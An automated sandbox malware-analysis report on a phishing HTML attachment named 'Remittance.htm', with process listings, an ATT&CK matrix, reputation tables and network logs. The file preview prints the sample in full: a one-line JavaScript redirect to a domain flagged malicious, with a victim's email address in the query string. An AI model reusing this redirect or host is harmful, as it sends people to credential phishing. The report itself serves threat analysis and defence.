Windows
Analysis Report
Remittance.htm
Overview
General Information
Detection
Score: | 48 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- chrome.exe (PID: 5676 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" --st art-maximi zed "about :blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408) - chrome.exe (PID: 5840 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-G B --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =1940 --fi eld-trial- handle=171 2,i,137326 9792511892 383,148330 1725177217 5095,13107 2 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationTarge tPredictio n /prefetc h:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- chrome.exe (PID: 2040 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" "C:\U sers\user\ Desktop\Re mittance.h tm MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- cleanup
Click to jump to signature section
Source: | Directory created: | Jump to behavior |
Networking |
---|
Source: | DNS query: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | HTTP traffic detected: |
System Summary |
---|
Source: | Initial sample: |
Source: | Classification label: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | File created: | Jump to behavior |
Source: | Window detected: |
Source: | Directory created: | Jump to behavior |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Windows Management Instrumentation | Path Interception | 1 Process Injection | 2 Masquerading | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 5 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 6 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 4 Ingress Tool Transfer | SIM Card Swap | Carrier Billing Fraud |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
accounts.google.com | 216.58.209.45 | true | false | high | |
hhid829389.xyz | 108.174.197.216 | true | true |
| unknown |
www.google.com | 142.250.184.100 | true | false | high | |
clients.l.google.com | 142.250.180.174 | true | false | high | |
example.com | 93.184.216.34 | true | false | high | |
ianawww.vip.icann.org | 192.0.46.8 | true | false | high | |
href.li | 192.0.78.26 | true | false | high | |
www.vip.icann.org | 192.0.47.7 | true | false | high | |
clients2.google.com | unknown | unknown | false | high | |
www.iana.org | unknown | unknown | false | high | |
pti.icann.org | unknown | unknown | false | high | |
www.icann.org | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false |
| unknown | |
false | high | ||
false | high | ||
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
192.0.46.8 | ianawww.vip.icann.org | United States | 16876 | ICANN-DCUS | false | |
93.184.216.34 | example.com | European Union | 15133 | EDGECASTUS | false | |
108.174.197.216 | hhid829389.xyz | United States | 54290 | HOSTWINDSUS | true | |
216.58.209.45 | accounts.google.com | United States | 15169 | GOOGLEUS | false | |
192.0.78.26 | href.li | United States | 2635 | AUTOMATTICUS | false | |
239.255.255.250 | unknown | Reserved | unknown | unknown | false | |
142.250.184.100 | www.google.com | United States | 15169 | GOOGLEUS | false | |
142.250.180.174 | clients.l.google.com | United States | 15169 | GOOGLEUS | false |
IP |
---|
192.168.2.1 |
127.0.0.1 |
Joe Sandbox Version: | 36.0.0 Rainbow Opal |
Analysis ID: | 800698 |
Start date and time: | 2023-02-07 18:21:34 +01:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 35s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Cookbook file name: | defaultwindowshtmlcookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample file name: | Remittance.htm |
Detection: | MAL |
Classification: | mal48.troj.winHTM@35/0@19/10 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
- TCP Packets have been reduced to 100
- Excluded IPs from analysis (whitelisted): 142.250.184.99, 34.104.35.123, 142.250.180.163
- Excluded domains from analysis (whitelisted): edgedl.me.gvt1.com, update.googleapis.com, clientservices.googleapis.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtWriteVirtualMemory calls found.
File type: | |
Entropy (8bit): | 5.255051358476731 |
TrID: |
|
File name: | Remittance.htm |
File size: | 225 |
MD5: | 39bb32548e89f58ceb6960e84791979e |
SHA1: | e70af8a69f739dc0501013a1a9ebb5f4cef552e2 |
SHA256: | bf0f39c7f991c76bbd138e4d74dc9cc402aca673c5edd8b6005dc41faf739208 |
SHA512: | 18764d29c900701e18f6d7b0cf3c9fd59c0cd1a0baab510062a28e91755b5503f1bd979e720d00524ffb0d1c213b30a36a89b22e152cdf9005f925fac4c621b4 |
SSDEEP: | 6:h4QWqqMzSKcAIK7UK+oSPNKDVjgnEzcTi/MWXfGb:hPlzSb1K0NwVsEzcu/MWPGb |
TLSH: | 7AD0A7EB3C50DD056971ACF45C75E22C94B7B2C45E96E217D4C4792B15203B89D471CE |
File Content Preview: | <!DOCTYPE html>..<html>..<body>..<script>..// Javascript URL redirection - generated by www.rapidtables.com..window.location.replace("https://hhid829389.xyz/?aoul&qrc=glenn.walker@cra-arc.gc.ca");..</script>..</body>..</html> |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 7, 2023 18:22:35.514782906 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:35.514828920 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:35.514906883 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:35.515350103 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:35.515362024 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:35.516421080 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:35.516468048 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:35.516552925 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:35.516911983 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:35.516928911 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:35.597213984 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:35.600869894 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:35.603200912 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:35.603229046 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:35.603496075 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:35.603521109 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:35.604312897 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:35.604425907 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:35.605714083 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:35.605828047 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:35.605948925 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:35.606060982 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:36.213845968 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:36.213895082 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:36.214107037 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:36.214555979 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:36.214592934 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:36.214812994 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:36.214847088 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:36.214968920 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:36.215183973 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:36.215209007 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:36.261046886 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:36.261260033 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:36.261344910 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:36.261404037 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:36.261482000 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:36.281936884 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:36.282457113 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:36.282661915 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:36.282980919 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:36.308343887 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:36.308389902 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:36.309290886 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:36.309329987 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:36.487548113 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.487634897 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.487763882 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.488193989 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.488240004 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.788575888 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.788919926 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.788960934 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.790175915 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.790792942 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.818490982 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.818530083 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.818741083 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.818754911 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.818949938 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.984761000 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.984795094 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:37.085900068 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:38.763835907 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:38.763922930 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:38.764024973 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:38.810707092 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:38.810787916 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:38.880678892 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:38.917392015 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:38.917450905 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:38.921080112 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:38.921307087 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:38.924998999 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:38.925035000 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:38.925301075 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:38.997092009 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:38.997138023 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:39.097035885 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:39.372406006 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:39.372523069 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:39.372613907 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:39.373567104 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:39.373591900 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:39.432368040 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.432426929 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.432523012 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.432948112 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.432964087 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.485980988 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.488847971 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.488930941 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.489515066 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.489671946 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.490298033 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.490406036 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.492759943 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.492789030 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.492934942 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.493001938 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 7, 2023 18:22:35.359690905 CET | 51600 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:35.359971046 CET | 57417 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:35.377711058 CET | 53 | 57417 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:35.377994061 CET | 53 | 51600 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:36.376741886 CET | 61105 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:36.408771038 CET | 53 | 61105 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:38.675455093 CET | 59683 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:38.696670055 CET | 53 | 59683 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:38.731987953 CET | 64167 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:38.751524925 CET | 53 | 64167 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:39.377855062 CET | 58565 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:39.398554087 CET | 53 | 58565 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:39.848314047 CET | 56807 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:39.866036892 CET | 53 | 56807 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:52.922415972 CET | 55570 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:52.941468954 CET | 53 | 55570 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:53.447417021 CET | 64906 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:53.467806101 CET | 53 | 64906 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:57.577347994 CET | 64700 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:57.581682920 CET | 56022 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:57.594928980 CET | 53 | 64700 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:57.773257971 CET | 53 | 56022 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:59.932573080 CET | 49750 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:23:00.099409103 CET | 53 | 49750 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:23:38.747319937 CET | 53370 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:23:38.765232086 CET | 53 | 53370 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:23:59.240793943 CET | 51766 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:23:59.241426945 CET | 61522 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:23:59.258929968 CET | 53 | 51766 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:23:59.588109016 CET | 53 | 61522 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:24:03.115114927 CET | 53622 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:24:03.133151054 CET | 53 | 53622 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:24:39.241616011 CET | 50065 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:24:39.262686968 CET | 53 | 50065 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:24:39.385073900 CET | 53573 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:24:39.403084040 CET | 53 | 53573 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:25:28.937002897 CET | 61366 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:25:28.954996109 CET | 53 | 61366 | 8.8.8.8 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Feb 7, 2023 18:22:35.359690905 CET | 192.168.2.4 | 8.8.8.8 | 0xa045 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:35.359971046 CET | 192.168.2.4 | 8.8.8.8 | 0x4c48 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:36.376741886 CET | 192.168.2.4 | 8.8.8.8 | 0xf521 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:38.675455093 CET | 192.168.2.4 | 8.8.8.8 | 0xdb35 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:38.731987953 CET | 192.168.2.4 | 8.8.8.8 | 0x109e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:39.377855062 CET | 192.168.2.4 | 8.8.8.8 | 0xd64b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:39.848314047 CET | 192.168.2.4 | 8.8.8.8 | 0x6456 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:52.922415972 CET | 192.168.2.4 | 8.8.8.8 | 0x6141 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:53.447417021 CET | 192.168.2.4 | 8.8.8.8 | 0x43bb | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:57.577347994 CET | 192.168.2.4 | 8.8.8.8 | 0xafb5 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:57.581682920 CET | 192.168.2.4 | 8.8.8.8 | 0xe24d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:59.932573080 CET | 192.168.2.4 | 8.8.8.8 | 0xb596 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:23:38.747319937 CET | 192.168.2.4 | 8.8.8.8 | 0x7297 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:23:59.240793943 CET | 192.168.2.4 | 8.8.8.8 | 0x4850 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:23:59.241426945 CET | 192.168.2.4 | 8.8.8.8 | 0x1dec | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:24:03.115114927 CET | 192.168.2.4 | 8.8.8.8 | 0x89fd | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:24:39.241616011 CET | 192.168.2.4 | 8.8.8.8 | 0x7109 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:24:39.385073900 CET | 192.168.2.4 | 8.8.8.8 | 0x37ce | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:25:28.937002897 CET | 192.168.2.4 | 8.8.8.8 | 0x779b | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Feb 7, 2023 18:22:35.377711058 CET | 8.8.8.8 | 192.168.2.4 | 0x4c48 | No error (0) | clients.l.google.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:35.377711058 CET | 8.8.8.8 | 192.168.2.4 | 0x4c48 | No error (0) | 142.250.180.174 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:35.377994061 CET | 8.8.8.8 | 192.168.2.4 | 0xa045 | No error (0) | 216.58.209.45 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:36.408771038 CET | 8.8.8.8 | 192.168.2.4 | 0xf521 | No error (0) | 108.174.197.216 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:38.696670055 CET | 8.8.8.8 | 192.168.2.4 | 0xdb35 | No error (0) | 142.250.184.100 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:38.751524925 CET | 8.8.8.8 | 192.168.2.4 | 0x109e | No error (0) | 142.250.184.100 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:39.398554087 CET | 8.8.8.8 | 192.168.2.4 | 0xd64b | No error (0) | 192.0.78.26 | A (IP address) | IN (0x0001) | false | ||
